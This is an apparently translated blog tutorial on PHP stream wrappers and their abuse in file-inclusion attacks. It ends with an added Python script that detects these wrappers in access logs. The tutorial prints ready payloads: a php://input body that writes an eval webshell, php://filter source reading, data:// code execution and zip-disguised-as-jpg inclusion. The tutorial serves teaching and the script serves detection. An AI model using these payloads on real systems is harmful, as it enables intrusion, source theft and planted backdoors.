[PHP pseudo protocol] source code reading, file reading and writing, and arbitrary PHP command execution
2022-07-25 17:09:00 【Black zone (rise)】
1. Introduction
1.1 Overview:
PHP pseudo-protocols are the protocols and wrappers that PHP supports. These protocols can be used to execute many commands.
1.2 The 12 pseudo-protocols supported by PHP
file:// Access the local file system
http:// Access HTTP(s) URLs
ftp:// Access FTP(s) URLs
php:// Access the various input/output streams (I/O streams)
zlib:// Compression streams
data:// Data (RFC 2397)
glob:// Find pathnames matching a pattern
phar:// PHP archive
ssh2:// Secure Shell 2
rar:// RAR
ogg:// Audio streams
expect:// Handle interactive streams
1.3 Prerequisites:
php.ini has two relevant parameters:
allow_url_fopen: allows files to be accessed through URL wrappers (default ON)
allow_url_include: whether files may be included through URL wrappers (default OFF, i.e. not allowed)
2. Examples
2.1 file://
Prerequisites:
allow_url_fopen: off/on
allow_url_include: off/on
That is, file:// is not affected by allow_url_fopen or allow_url_include.
Usage:
file:// followed by the absolute file path
?file=file://D:/xxxx/1.txt
file= followed by a relative path
?file=./1.txt
file= followed by a URL
?file=http://127.0.0.1/1.txt
2.2 php://
Prerequisites:
allow_url_fopen: off/on
allow_url_include: must be on only for php://input, php://stdin, php://memory and php://temp
Protocol: Description
php://input
  1. A read-only stream that gives access to the raw request data; in a POST request it exposes the data part of the POST.
  2. php://input is not available when enctype="multipart/form-data".
php://output
  A write-only stream that allows writing to the output buffer in the same way as print and echo.
php://fd
  (>=5.3.6) Allows direct access to the specified file descriptor.
php://memory, php://temp
  1. (>=5.1.0) File-like stream wrappers that allow temporary data to be read and written.
  2. The only difference between the two is that php://memory always stores its data in memory, while php://temp switches to a temporary file once the amount of data in memory reaches the predefined limit (2MB by default). The location of the temporary file is determined in the same way as sys_get_temp_dir().
php://filter
  1. (>=5.0.0) A meta-wrapper designed to apply filters to a stream at the time it is opened.
  2. Very useful with all-in-one file functions such as readfile(), file() and file_get_contents(), where there is otherwise no chance to apply a filter before the stream contents are read.
php://input
Prerequisite: allow_url_fopen=on and allow_url_include=on
Submitting PHP code in the POST body leads to arbitrary code execution, for example writing a file (a Trojan).
php://input + [POST DATA]
e.g.:
In the URL: ……?file=php://input
In the POST body: <?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST['123'])?>');?>
php://filter
Reading file source code
php://filter can return the source code of a specified file. When it is used through a file-inclusion vulnerability, the php://filter stream would be executed as a PHP file, so the content is generally encoded to keep it from being executed and then decoded after it has been retrieved. This achieves reading of arbitrary files.
……?file=php://filter/read=convert.base64-encode/resource=[file path]
2.3 data://
Prerequisites:
allow_url_fopen: on
allow_url_include: on
Introduction:
A data stream wrapper that passes data in the corresponding format.
It can be used to execute PHP code.
Usage:
data://text/plain,[content]
data://text/plain;base64,[base64-encoded content]
Example:
……?file=data://text/plain,<?php%20phpinfo();?>
……?file=data://text/plain;base64,[base64-encoded content]
2.4 phar://, zip://, bzip2://, zlib://
Introduction:
Used to read compressed files; sub-files inside a compressed file can be accessed. More importantly, no particular suffix has to be specified: the archive can be renamed to any suffix.
Prerequisites:
allow_url_fopen: off/on
allow_url_include: off/on
Usage:
phar://[compressed file path]/[name of the sub-file inside the compressed file]
zip://[absolute path of the compressed file]%23[name of the sub-file inside the compressed file] (%23 is #)
compress.bzip2://file.bz2
Example:
1. Add the PHP file to a compressed file (phar)
……?file=phar://D:/……1.zip/1.php
2. Add the PHP file to 1.zip, rename 1.zip to 1.jpg, then upload it to the target server (zip)
……?file=zip://D:/……1.jpg%231.php
3. Compress 1.php into 1.bz2 (bzip2)
……?file=compress.bzip2://D:/……1.bz2
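A detection sketch for the wrappers covered in section 2, added here as an example and not part of the original article: it scans web access-log lines for query parameters whose decoded value starts with one of these schemes, and records whether the article lists allow_url_include=On as a prerequisite (wrappers marked False still need input validation even with the default php.ini). The log lines, the parameter name `file` and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Wrapper prefix -> True when this article lists allow_url_include=On as a
# prerequisite; False means it works in include() with that setting Off.
# "compress.zlib://" is the full prefix of the zlib wrapper named in 2.4.
WRAPPERS = {
    "php://input": True, "data:": True,
    "php://filter": False, "file://": False, "phar://": False,
    "zip://": False, "compress.bzip2://": False, "compress.zlib://": False,
}
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded schemes are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.strip().lower()

def scan_line(line):
    """Return (parameter, wrapper, needs_allow_url_include) per finding."""
    match = REQUEST.search(line)
    if not match:
        return []
    findings = []
    for pair in urlsplit(match.group(1)).query.split("&"):
        name, _, raw = pair.partition("=")
        value = decode_fully(raw)
        for prefix, needs_include in WRAPPERS.items():
            if value.startswith(prefix):
                findings.append((name, prefix, needs_include))
    return findings

def scan_log(lines):
    return [(i, f) for i, line in enumerate(lines) for f in scan_line(line)]

# Constructed sample lines (combined log format), not from a real system.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Jul/2022:17:09:00 +0000] "GET /index.php?file=./1.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [25/Jul/2022:17:09:04 +0000] "GET /index.php?file=PHP://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 2048',
    '203.0.113.5 - - [25/Jul/2022:17:09:09 +0000] "POST /index.php?file=php%3A%2F%2Finput HTTP/1.1" 200 17',
    '203.0.113.5 - - [25/Jul/2022:17:09:15 +0000] "GET /index.php?file=zip%253A%252F%252FD%3A/up/1.jpg%25231.php HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    for index, finding in scan_log(SAMPLE_LOG):
        print(index, finding)
```

Access logs record only the request line, so a php://input hit shows the parameter but not the code carried in the POST body; that has to come from request-body logging or a WAF.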